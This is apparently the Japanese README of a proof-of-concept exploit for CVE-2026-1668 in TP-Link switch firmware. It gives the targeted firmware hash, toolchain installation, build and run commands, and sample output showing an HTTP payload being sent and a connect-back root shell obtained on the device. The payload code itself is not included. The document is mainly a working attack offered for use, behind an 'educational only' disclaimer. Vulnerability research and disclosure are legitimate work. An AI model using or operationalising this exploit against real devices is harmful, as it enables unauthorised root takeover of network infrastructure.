
TP-LinkスイッチファームウェアのCVE-2026-1668に対する概念実証エクスプロイトで、脆弱なデバイス上でrootシェルを取得するMIPSペイロードを配信します。
これは CVE-2026-1668 の概念実証エクスプロイトです。純粋に教育目的のみを意図しています。所有していない、または明示的な許可を得ていないシステムを攻撃しようとしないでください。
この概念実証は、以下の SHA256 ハッシュを持つファームウェアイメージに対して開発されました: 4b862b8dd7fde44fa57a39b35b562f21878dd6abb8e92ccd9cdef571ed60d544。
このハッシュと一致することが知られているファームウェアの名前(完全なリストではありません):
以前のファームウェアバージョンも脆弱である可能性が高いですが、エクスプロイトペイロードに若干の変更が必要になる場合があります。
ペイロードの仕組みの説明は、こちらのブログ記事にあります。
ペイロードをビルドするには MIPS Linux GCC ツールチェーンが必要です。Ubuntu 24.04 では、sudo apt install gcc-mips-linux-gnu でインストールできます。
$ make
このエクスプロイトは、HTTP サーバーが最初のリクエストを処理する前に実行する必要があります(つまり、起動直後に)。
$ ./run.sh
このスクリプトは root シェルに落としてくれるはずです。そうでなければ、エクスプロイトは失敗しています。
[*] Sending payload
HTTP/1.1 200 OK
Server: Web Switch
Connection: close
Content-Type: application/json
{"data":{"mByCtrl":0,"includePrivacyPolicy":0,"includeAutoCheck":1,"includeSshController":1},"errorcode":0,"success":true,"timeout":false}
[*] Connecting back to get a shell
/bin/sh: can't access tty; job control turned off
/etc #